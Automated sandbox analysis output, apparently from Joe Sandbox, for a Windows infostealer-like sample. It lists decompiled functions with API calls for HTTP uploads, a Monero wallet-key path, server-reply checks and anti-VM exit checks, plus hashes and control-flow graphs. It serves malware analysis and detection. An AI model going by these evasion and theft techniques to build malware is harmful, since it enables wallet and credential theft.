                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: f1a0b7c9e1166457addf1fcf880ca5a75707552035b5ab903210d626c0d1d44e
                                    • Instruction ID: 1d5b6dd7ef71b190b95847a760e3353f8d06af550383ce8b7ae062e9c7d87e8d
                                    • Opcode Fuzzy Hash: f1a0b7c9e1166457addf1fcf880ca5a75707552035b5ab903210d626c0d1d44e
                                    • Instruction Fuzzy Hash: 0B622DB563D7009FC344DFEAFC88956BBB9A74D703750861ABA19C3270D735AA40EB60
                                    Function 006848D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 6848d0-684992 call 69aab0 call 684800 call 69aa50 * 5 InternetOpenA StrCmpCA 816 68499b-68499f 801->816 817 684994 801->817 818 684f1b-684f43 InternetCloseHandle call 69ade0 call 68a210 816->818 819 6849a5-684b1d call 698cf0 call 69ac30 call 69abb0 call 69ab10 * 2 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69ac30 call 69abb0 call 69ab10 * 2 InternetConnectA 816->819 817->816 829 684f82-684ff2 call 698b20 * 2 call 69aab0 call 69ab10 * 8 818->829 830 684f45-684f7d call 69ab30 call 69acc0 call 69abb0 call 69ab10 818->830 819->818 905 684b23-684b27 819->905 830->829 906 684b29-684b33 905->906 907 684b35 905->907 908 684b3f-684b72 HttpOpenRequestA 906->908 907->908 909 684b78-684e78 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69aa50 call 69ac30 * 2 call 69abb0 call 69ab10 * 2 call 69ade0 lstrlen call 69ade0 * 2 lstrlen call 69ade0 HttpSendRequestA 908->909 910 684f0e-684f15 InternetCloseHandle 908->910 1021 684e82-684eac InternetReadFile 909->1021 910->818 1022 684eae-684eb5 1021->1022 1023 684eb7-684f09 InternetCloseHandle call 69ab10 1021->1023 1022->1023 1024 684eb9-684ef7 call 69acc0 call 69abb0 call 69ab10 1022->1024 1023->910 1024->1021
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00684965
                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 0068498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00684B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006A0DDE,00000000,?,?,00000000,?,",00000000,?,0142E340), ref: 00684E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00684E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00684E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00684E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00684EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00684F15
                                    • HttpOpenRequestA.WININET(00000000,0142E280,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 00684B65
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00684F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: 50e9a2d2d853cb636294b313ab8c1e6353106f0618362a2026574776202d6dc3
                                    • Instruction ID: 071bb850ef87ebfd9e2cbf76b5249b79d1e614fb7dce60d34fa30058c25eacda
                                    • Opcode Fuzzy Hash: 50e9a2d2d853cb636294b313ab8c1e6353106f0618362a2026574776202d6dc3
                                    • Instruction Fuzzy Hash: 8612D772910118AACF54EBD0DDA2FEEB3BEAF15300F10459DB10666495DF702B48CFA9
                                    Function 00695760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 695760-6957c7 call 695d20 call 69ab30 * 3 call 69aa50 * 4 1106 6957cc-6957d3 1090->1106 1107 6957d5-695806 call 69ab30 call 69aab0 call 681590 call 695440 1106->1107 1108 695827-69589c call 69aa50 * 2 call 681590 call 695510 call 69abb0 call 69ab10 call 69ade0 StrCmpCA 1106->1108 1124 69580b-695822 call 69abb0 call 69ab10 1107->1124 1134 6958e3-6958f9 call 69ade0 StrCmpCA 1108->1134 1138 69589e-6958de call 69aab0 call 681590 call 695440 call 69abb0 call 69ab10 1108->1138 1124->1134 1139 695a2c-695a94 call 69abb0 call 69ab30 * 2 call 6816b0 call 69ab10 * 4 call 681670 call 681550 1134->1139 1140 6958ff-695906 1134->1140 1138->1134 1270 695d13-695d16 1139->1270 1143 695a2a-695aaf call 69ade0 StrCmpCA 1140->1143 1144 69590c-695913 1140->1144 1163 695be1-695c49 call 69abb0 call 69ab30 * 2 call 6816b0 call 69ab10 * 4 call 681670 call 681550 1143->1163 1164 695ab5-695abc 1143->1164 1148 69596e-6959e3 call 69aa50 * 2 call 681590 call 695510 call 69abb0 call 69ab10 call 69ade0 StrCmpCA 1144->1148 1149 695915-695969 call 69ab30 call 69aab0 call 681590 call 695440 call 69abb0 call 69ab10 1144->1149 1148->1143 1249 6959e5-695a25 call 69aab0 call 681590 call 695440 call 69abb0 call 69ab10 1148->1249 1149->1143 1163->1270 1170 695bdf-695c64 call 69ade0 StrCmpCA 1164->1170 1171 695ac2-695ac9 1164->1171 1200 695c78-695ce1 call 69abb0 call 69ab30 * 2 call 6816b0 call 69ab10 * 4 call 681670 call 681550 1170->1200 1201 695c66-695c71 Sleep 1170->1201 1179 695acb-695b1e call 69ab30 call 69aab0 call 681590 call 695440 call 69abb0 call 69ab10 1171->1179 1180 695b23-695b98 call 69aa50 * 2 call 681590 call 695510 call 69abb0 call 69ab10 call 69ade0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 695b9a-695bda call 69aab0 call 681590 call 695440 call 69abb0 call 69ab10 1180->1275 1200->1270 1201->1106 1249->1143 1275->1170
                                    APIs
                                      • Part of subcall function 0069AB30: lstrlen.KERNEL32(00684F55,?,?,00684F55,006A0DDF), ref: 0069AB3B
                                      • Part of subcall function 0069AB30: lstrcpy.KERNEL32(006A0DDF,00000000), ref: 0069AB95
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006958F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695AA7
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00695440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695478
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00695510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695568
                                      • Part of subcall function 00695510: lstrlen.KERNEL32(00000000), ref: 0069557F
                                      • Part of subcall function 00695510: StrStrA.SHLWAPI(00000000,00000000), ref: 006955B4
                                      • Part of subcall function 00695510: lstrlen.KERNEL32(00000000), ref: 006955D3
                                      • Part of subcall function 00695510: lstrlen.KERNEL32(00000000), ref: 006955FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006959DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00695C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 87501ab315a22df5e9555af7f67829c6f2f1c47378077c8a4b16206b56cb0f17
                                    • Instruction ID: ea4b6b16a569d9959881db616e2f212173f0e80aacd82bea3278ae7f8af2719b
                                    • Opcode Fuzzy Hash: 87501ab315a22df5e9555af7f67829c6f2f1c47378077c8a4b16206b56cb0f17
                                    • Instruction Fuzzy Hash: E2E12F719141049BCF94FBE0EDA2AFD73BFAF54300F40865CB50666995EF306A08CB9A
                                    Function 006919F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 6919f0-691a1d call 69ade0 StrCmpCA 1304 691a1f-691a21 ExitProcess 1301->1304 1305 691a27-691a41 call 69ade0 1301->1305 1309 691a44-691a48 1305->1309 1310 691a4e-691a61 1309->1310 1311 691c12-691c1d call 69ab10 1309->1311 1313 691bee-691c0d 1310->1313 1314 691a67-691a6a 1310->1314 1313->1309 1316 691aad-691abe StrCmpCA 1314->1316 1317 691acf-691ae0 StrCmpCA 1314->1317 1318 691b41-691b52 StrCmpCA 1314->1318 1319 691ba1-691bb2 StrCmpCA 1314->1319 1320 691bc0-691bd1 StrCmpCA 1314->1320 1321 691b63-691b74 StrCmpCA 1314->1321 1322 691b82-691b93 StrCmpCA 1314->1322 1323 691a85-691a94 call 69ab30 1314->1323 1324 691a99-691aa8 call 69ab30 1314->1324 1325 691afd-691b0e StrCmpCA 1314->1325 1326 691b1f-691b30 StrCmpCA 1314->1326 1327 691bdf-691be9 call 69ab30 1314->1327 1328 691a71-691a80 call 69ab30 1314->1328 1342 691aca 1316->1342 1343 691ac0-691ac3 1316->1343 1344 691aee-691af1 1317->1344 1345 691ae2-691aec 1317->1345 1350 691b5e 1318->1350 1351 691b54-691b57 1318->1351 1333 691bbe 1319->1333 1334 691bb4-691bb7 1319->1334 1336 691bdd 1320->1336 1337 691bd3-691bd6 1320->1337 1329 691b80 1321->1329 1330 691b76-691b79 1321->1330 1331 691b9f 1322->1331 1332 691b95-691b98 1322->1332 1323->1313 1324->1313 1346 691b1a 1325->1346 1347 691b10-691b13 1325->1347 1348 691b3c 1326->1348 1349 691b32-691b35 1326->1349 1327->1313 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 691af8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00691A15
                                    • ExitProcess.KERNEL32 ref: 00691A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 635c0cb59e2c5f45b1e11db554bc03d29dca6ea11e54118f68fb9b18eaef32cf
                                    • Instruction ID: 25d1ef77735164569a4716fb62fcd5b34a215f9ef1922d255b9f7b6f1b87e41d
                                    • Opcode Fuzzy Hash: 635c0cb59e2c5f45b1e11db554bc03d29dca6ea11e54118f68fb9b18eaef32cf
                                    • Instruction Fuzzy Hash: 75513075A0820AAFDF04DFD4DA54AAE77BFAF45704F204088E412AB654E770EE41DB91
                                    Function 00696C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420660), ref: 00699BF1
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014206A8), ref: 00699C0A
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014207C8), ref: 00699C22
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014205B8), ref: 00699C3A
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014207E0), ref: 00699C53
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01429198), ref: 00699C6B
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01416840), ref: 00699C83
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01416940), ref: 00699C9C
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420828), ref: 00699CB4
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014206C0), ref: 00699CCC
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420648), ref: 00699CE5
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014207F8), ref: 00699CFD
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01416820), ref: 00699D15
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420840), ref: 00699D2E
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 006811D0: ExitProcess.KERNEL32 ref: 00681211
                                      • Part of subcall function 00681160: GetSystemInfo.KERNEL32(?), ref: 0068116A
                                      • Part of subcall function 00681160: ExitProcess.KERNEL32 ref: 0068117E
                                      • Part of subcall function 00681110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                                      • Part of subcall function 00681110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                                      • Part of subcall function 00681110: ExitProcess.KERNEL32 ref: 00681143
                                      • Part of subcall function 00681220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                                      • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681258
                                      • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681266
                                      • Part of subcall function 00681220: ExitProcess.KERNEL32 ref: 00681294
                                      • Part of subcall function 00696A10: GetUserDefaultLangID.KERNEL32 ref: 00696A14
                                      • Part of subcall function 00681190: ExitProcess.KERNEL32 ref: 006811C6
                                      • Part of subcall function 006979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697A10
                                      • Part of subcall function 006979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697A17
                                      • Part of subcall function 006979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00697A2F
                                      • Part of subcall function 00697A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697AA0
                                      • Part of subcall function 00697A70: RtlAllocateHeap.NTDLL(00000000), ref: 00697AA7
                                      • Part of subcall function 00697A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00697ABF
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00696D99
                                    • Sleep.KERNEL32(00001770), ref: 00696DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696DBA
                                    • ExitProcess.KERNEL32 ref: 00696DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: d70a9d5ca986899a9a732d8a8e1b4dbd447454e2733b44687895a910e8ce13a1
                                    • Instruction ID: a9b8d01e90fc8520d3a02a66ec241bb752efeb6a343a148eaf29b3b945cf7343
                                    • Opcode Fuzzy Hash: d70a9d5ca986899a9a732d8a8e1b4dbd447454e2733b44687895a910e8ce13a1
                                    • Instruction Fuzzy Hash: 4131EB31A18204ABCF84F7F0DC66ABE72BEAF04701F10491CF11266595DF706A0587AA
                                    Function 00681220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 681220-681247 call 698b40 GlobalMemoryStatusEx 1439 681249-681271 call 69dd30 * 2 1436->1439 1440 681273-68127a 1436->1440 1442 681281-681285 1439->1442 1440->1442 1444 68129a-68129d 1442->1444 1445 681287 1442->1445 1447 681289-681290 1445->1447 1448 681292-681294 ExitProcess 1445->1448 1447->1444 1447->1448
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                                    • __aulldiv.LIBCMT ref: 00681258
                                    • __aulldiv.LIBCMT ref: 00681266
                                    • ExitProcess.KERNEL32 ref: 00681294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: 94b252179f8a2c2bd41604f4d3bffa9871c5797018221ad2b95c85a79c10c543
                                    • Instruction ID: 057379baa3af3d4b69e18e7d2d78c338d5dfa8013043d29b1206c17c72b20e8f
                                    • Opcode Fuzzy Hash: 94b252179f8a2c2bd41604f4d3bffa9871c5797018221ad2b95c85a79c10c543
                                    • Instruction Fuzzy Hash: 3D0162B0D54308BBDF10EFE0DC59BADB77DAF15705F108558E604BA1C0C67456868759
                                    Function 00696D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1450 696d93 1451 696daa 1450->1451 1453 696d5a-696d77 call 69ade0 OpenEventA 1451->1453 1454 696dac-696dc2 call 696bc0 call 695d60 CloseHandle ExitProcess 1451->1454 1459 696d79-696d91 call 69ade0 CreateEventA 1453->1459 1460 696d95-696da4 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696D6A
